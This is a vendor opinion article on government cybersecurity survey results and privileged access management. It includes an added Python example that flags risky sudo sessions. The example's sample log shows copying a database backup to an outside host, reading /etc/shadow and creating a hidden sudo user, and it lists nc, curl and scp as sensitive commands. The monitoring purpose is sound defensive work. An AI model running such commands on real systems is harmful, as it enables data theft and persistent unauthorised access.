Government cyber response must evolve to stay ahead of growing threats

Digital transformation and cloud services are being widely embraced by U.S. public sector IT and security teams as they support more agile, productive and cost-effective operations. Modernization can be a great thing, but government agencies must understand how these initiatives can expand an organization’s threat surface and leave solutions, once thought to be highly secure, vulnerable.

Industry-shaking cyberattacks rolled through 2020 and early 2021, exposing the underbelly of our nation’s critical infrastructure. If not appropriately addressed, this trend foreshadows great peril for U.S. government agencies and citizens. A case in point is the SolarWinds supply chain attack, which according to a New York Times report impacted more than 250 public sector agencies and private organizations.

Under increasing pressure to respond to mounting cyber threats, the White House issued an Executive Order on Improving the Nation’s Cybersecurity on May 12, 2021. Government agencies have acknowledged a special responsibility to protect critical systems and the highly sensitive government and citizen information they contain. Compromise, misuse or disruption of critical systems can jeopardize agency missions while also causing financial damage, loss of trust, loss of life and widespread societal consequences.

Understanding the key trends impacting agency cybersecurity

To better understand what keeps public sector infosec professionals up at night, BeyondTrust surveyed 200 senior IT and security professionals within U.S. federal civilian, federal defense, state and local government agencies. The survey respondents were asked about security trends, concerns, threat actors and technology priorities — both now and in the future.

The cybersecurity measures were divided into three groups based on the Center for Internet Security (CIS) Critical Security Controls list: basic, foundational and organizational. For the basic group, the most important current measure cited was inventorying assets. Inventory and control of hardware assets (74% of respondents) came in at #1, with inventory and control of software assets (56%) at #3. Asset discovery and categorization is usually a necessary first step to securing agency resources and eliminating the blind spots that give attackers an unwatched way in, so it makes sense to see these measures at the top. In the #2 spot is maintenance, monitoring and analysis of audit logs (63%), with the majority (53%) expecting it to remain just as important or to increase in importance in 1-3 years.

Audit trails help organizations comply with government regulations and other mandates. Monitoring and auditing capabilities provide oversight of user activity, alert on threats in real time and support forensic investigation. Auditing and monitoring of privileged sessions are particularly important, since these sessions represent the most sensitive access and the most powerful capabilities, with the highest damage potential if misused.
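The kind of privileged-session monitoring described above, as an added example that is not part of the original article and is not BeyondTrust code: a small rule engine in Python that parses constructed sudo audit lines (the syslog format Linux sudo emits) and raises alerts for root activity on an unapproved host, outside an assumed change window, or involving a command that warrants review. The approved-host policy, the change window and the sensitive-command list are assumptions for illustration, not values from the report.

```python
import re
from collections import Counter

# Constructed sudo log lines for illustration (not real data).
SAMPLE_LOG = """\
Jun  3 09:12:01 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Jun  3 09:14:22 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/journalctl -u nginx
Jun  3 23:41:07 db01 sudo:     bob : TTY=pts/2 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
Jun  3 23:43:55 db01 sudo:     bob : TTY=pts/2 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/scp /var/lib/db/backup.tgz ext@203.0.113.5:/tmp/
Jun  4 02:05:13 web02 sudo:    svc-deploy : TTY=unknown ; PWD=/opt/deploy ; USER=root ; COMMAND=/usr/sbin/useradd -m -G sudo backup2
Jun  4 10:30:45 app01 sudo:    carol : TTY=pts/1 ; PWD=/home/carol ; USER=root ; COMMAND=/usr/bin/apt-get upgrade
Jun  4 11:02:19 db01 sudo:     carol : TTY=pts/3 ; PWD=/home/carol ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
"""

# Field layout of a sudo syslog record: "<user> : TTY=... ; PWD=... ; USER=<target> ; COMMAND=<cmd>".
SUDO_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sudo:\s+"
    r"(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Assumed policy (hypothetical): which accounts may obtain root on which hosts.
APPROVED_HOSTS = {
    "alice": {"web01", "web02"},
    "bob": {"db01"},
    "carol": {"app01"},
    "svc-deploy": {"web01", "web02"},
}
CHANGE_WINDOW_HOURS = range(7, 20)  # assumed maintenance window, 07:00-19:59
# Commands that merit analyst review whenever run as root (assumed list).
SENSITIVE_COMMANDS = {"bash", "sh", "useradd", "usermod", "visudo", "scp", "curl", "nc"}


def parse_sudo_line(line):
    """Return a dict of fields for one sudo record, or None if the line is not one."""
    m = SUDO_RE.match(line)
    if m is None:
        return None
    event = m.groupdict()
    event["hour"] = int(event["ts"][-8:-6])  # HH from the "HH:MM:SS" tail
    # Match on the executable's basename so "/usr/bin/systemctl" is not mistaken for "nc".
    event["program"] = event["cmd"].split()[0].rsplit("/", 1)[-1]
    return event


def analyze(log_text):
    """Run the privileged-session rules over a log and return (user, host, rule, cmd) alerts."""
    alerts = []
    for line in log_text.splitlines():
        e = parse_sudo_line(line)
        if e is None:
            continue  # not a sudo record; other log sources are out of scope here
        user, host, cmd = e["user"], e["host"], e["cmd"]
        if host not in APPROVED_HOSTS.get(user, set()):
            alerts.append((user, host, "unapproved-host", cmd))
        if e["hour"] not in CHANGE_WINDOW_HOURS:
            alerts.append((user, host, "outside-change-window", cmd))
        if e["program"] in SENSITIVE_COMMANDS:
            alerts.append((user, host, "sensitive-command", cmd))
    return alerts


def summarize(alerts):
    """Alert count per account, the first cut an analyst wants for triage."""
    return dict(Counter(a[0] for a in alerts))


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for user, host, rule, cmd in found:
        print(f"{rule:22} {user:>11}@{host:<6} {cmd}")
    print(summarize(found))
```

Two of the constructed sessions show why session-level review matters more than single-event alerting: bob's late-night interactive root shell followed by copying a database backup off-host, and a service account creating a new sudo-capable user with no TTY. Each line trips a rule on its own, but the sequence is what an investigator needs, so a real deployment would correlate alerts by user and host rather than stop at the per-line output shown here.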

The foundational cybersecurity measures show greater change. The top 3 measures cited as important measures today are data protection (62%), data recovery (62%), and privileged access management (61%), while secure configuration for network devices and secure remote access land in the #4 and #5 spots, respectively.

The report also analyzed organizational cybersecurity measures, where the changes were less dramatic. This likely reflects the continued value of tried-and-true practices such as penetration testing, security awareness training and incident response.

Public sector security professionals consider PAM a key defense measure

Security professionals concerned with evolving cyber threats rank unwarranted privileged access among the most threatening cyberattack methods. The Cybersecurity Trends in Government 2021 Report lists privileged access management as a top foundational cybersecurity measure.

Whenever privileged access is granted, whether to a remote worker in any role or to a third-party provider, it creates insider threats that must be addressed. Without proper privileged access controls, organizations are exposed to privileged attack vectors that are ripe for exploitation. PAM mitigates these risks by identifying and protecting against misuse and malicious intent.

In detail, PAM enables organizations to control privileged account access across identities, passwords and endpoints to reduce risk. PAM also plays a crucial role in securing emerging government programs. According to the report, 61% of respondents consider PAM extremely or somewhat important today, with 71% expecting PAM to maintain or increase in importance within 1-3 years.

Secure digital transformation is necessary to keep pace with adversaries

Undoubtedly, digital transformation initiatives are important. Many agencies have achieved impactful results from automating manual processes, freeing up time to focus on innovation and mission support. Although mission critical, the acceleration of automation can introduce new security risks and expand the attack surface. In response, government security leaders have organized resources, looked to expand budgets and provided updated guidance on best practices to meet these threats.

Almost every cyberattack involves the exploitation of privileges or privileged access, either at the initial point of compromise or to advance an attack through lateral movement. PAM is integral to secure adoption of today’s digital transformation initiatives across the government, such as application modernization, cloud adoption, DevOps, edge computing, robotic process automation and zero trust. With the appropriate privileged access controls, government agencies can protect against threats, achieve compliance and securely support their mission.

Morey Haber is chief security officer at BeyondTrust.